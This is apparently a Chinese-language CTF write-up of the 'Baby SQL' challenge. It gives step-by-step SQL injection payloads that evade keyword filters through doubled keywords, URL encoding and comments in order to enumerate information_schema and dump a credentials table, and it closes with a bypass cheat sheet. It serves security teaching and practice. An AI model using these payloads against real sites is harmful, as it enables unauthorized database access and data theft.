0x01 Subject
Baby SQL
=> 注入漏洞
0x02 Mind Palace
這里的提示是 => 做了嚴(yán)格的過(guò)濾 => 關(guān)鍵在繞過(guò)(maybe)
/check.php?username=xxx&password=xxx
select x,x from table where username = xxx and password = xxx
payload = /check.php?username=root%27+or+1%3D1%3B%23&password=root
但是感覺(jué)上是注釋符被過(guò)濾了或者and or被過(guò)濾了
=> root%27+or+1%3D1%3B%23
| root' or 1=1;#
假設(shè)是or被過(guò)濾了囱稽,用url編碼一下試試%6f%72
=> root%27+%6f%72+1%3D1%3B%23
| root' or 1=1;#
反饋:1=1;#' 附近有語(yǔ)法錯(cuò)誤
那可能是;
or #
被過(guò)濾例嘱?
=> root%27/**/%6f%72/**/1%3D1%3B%23
=> root%27/**/oorr/**/1%3D1%3B%23
=> root%27%2520oorr%25201%3D1%3B%23
| root'%20oorr%201=1;#
反饋:Unknown column '20or' in 'where clause'
好像發(fā)現(xiàn)了什么不得了的東西 emm
過(guò)濾是肯定有過(guò)濾的 励烦;; oorr的繞過(guò)好像是沒(méi)問(wèn)題的
因?yàn)樯厦媸窃谧グ那闆r下改的 我們直接試試去登陸界面輸入
root = root' oorr 1=1;#
[圖片上傳失敗...(image-39c139-1611499391656)]
payload => /check.php?username=root%27+oorr+1%3D1%3B%23&password=root
成功繞過(guò)
查找column的數(shù)量
/check.php?username=admin' order by 3%23&password=1
反饋有error
推測(cè)by也是有過(guò)濾的用`bbyy代替
root = admin' oorrder bbyy 3#
=> Login Success
root = admin' oorrder bbyy 4#
=> Error
說(shuō)明這個(gè)table里面有三列數(shù)據(jù)
下一步就是找到回顯點(diǎn)
root = admin' union select 1,2,3
=> Error 有過(guò)濾需繞過(guò)
UnIon SeLEcT失敗 => 繼續(xù)拼字符串 => ununionion selselectect
root => 9' ununionion selselectect 1,2,3#
說(shuō)明column2 + column3可以作為回顯點(diǎn)
root => 9' ununionion selselectect 1,database(),version()#
=> database_name = geek
下一步:利用information_schema.tables
爆破有哪些table
root => 9' ununionion selselectect 999,999,group_concat(table_name) from information_schema.tables where table_schema=geek#
=> Error
from+where都有過(guò)濾焰情?都去試試看看
from => frfromom;where => whwhereere
Information_schema變成了;贤姆;;哦哦哦 or 也是有過(guò)濾的emm
root = 9' ununionion selselectect 999,999,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#
/check.php?username=9%27+ununionion+selselectect+999%2C999%2Cgroup_concat%28table_name%29+frfromom+infoorrmation_schema.tables+whwhereere+table_schema%3D'geek'%23&password=1
果斷猜測(cè)flag存在于b4bsql
表中 => 爆破column_name
root = 9' ununionion selselectect 999,999,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'#
(我麻了稳衬,and也需要繞一下(?ì _ í?))
再根據(jù)這個(gè)三個(gè)字段爆破數(shù)據(jù)
root = 9' ununionion selselectect 999,999,group_concat(id,username,passwoorrd) frfromom b4bsql#
(我麻了霞捡,有error多半是有什么地方?jīng)]繞|不要忘記了(?ì _ í?))
獲得flag
0x03 Look Ahead
小總結(jié)一下
- 根據(jù)提示知道sql注入有嚴(yán)格的過(guò)濾;再通過(guò)嘗試找到繞過(guò)的方法為藏字符
- 直接獲得username和password 但是沒(méi)有有用的信息
- 通過(guò)order by的報(bào)錯(cuò)知曉有多少列:root =
admin' oorrder bbyy 4#
- 尋找回顯點(diǎn):root =>
9' ununionion selselectect 1,2,3#
- 獲得數(shù)據(jù)庫(kù)基本信息:root =>
9' ununionion selselectect 1,database(),version()#
- 通過(guò)information_schema數(shù)據(jù)庫(kù)爆破table_name + column_names
- root =
9' ununionion selselectect 999,999,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#
- root =
9' ununionion selselectect 999,999,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'#
- root =
- 再根據(jù)知道的column_names去獲取數(shù)據(jù)
- root =
9' ununionion selselectect 999,999,group_concat(id,username,passwoorrd) frfromom b4bsql#
- root =
關(guān)于繞過(guò)過(guò)濾の潛在的方法
IF 過(guò)濾空格和--+等注釋符
多行注釋符(塊注釋符)薄疚、一對(duì)英文括號(hào)碧信、換行符、加號(hào)來(lái)代替空格
IF 特定字符被過(guò)濾
0x01 大小寫(xiě)變形
and => AnD
or => Or oR OR
0x02 改變編碼
采用url編碼街夭;把a(bǔ)scii編碼的0x給替換成%砰碴,比如o的ascii為0x6f
,url編碼就是%6f
0x03 添加注釋
select => sel/**/ect
and => a/**/nd
0x04 藏字符
select => selselectect
and => anandd
0x05 使用符號(hào)
and => &&
or => ||
IF 數(shù)字被過(guò)濾
0x01 數(shù)據(jù)類型改變
1 => 1.0
3 => 3.0
IF 關(guān)系符號(hào)被過(guò)濾
>
<
=> greatest() least()
=> where greatest(ascii(substr(database(),0,1)),64)=64
References:
https://blog.csdn.net/weixin_40950781/article/details/100061268
https://www.cnblogs.com/peterpan0707007/p/7501507.html
https://blog.csdn.net/qq_45521281/article/details/105533626
END(ˉ﹃ˉ)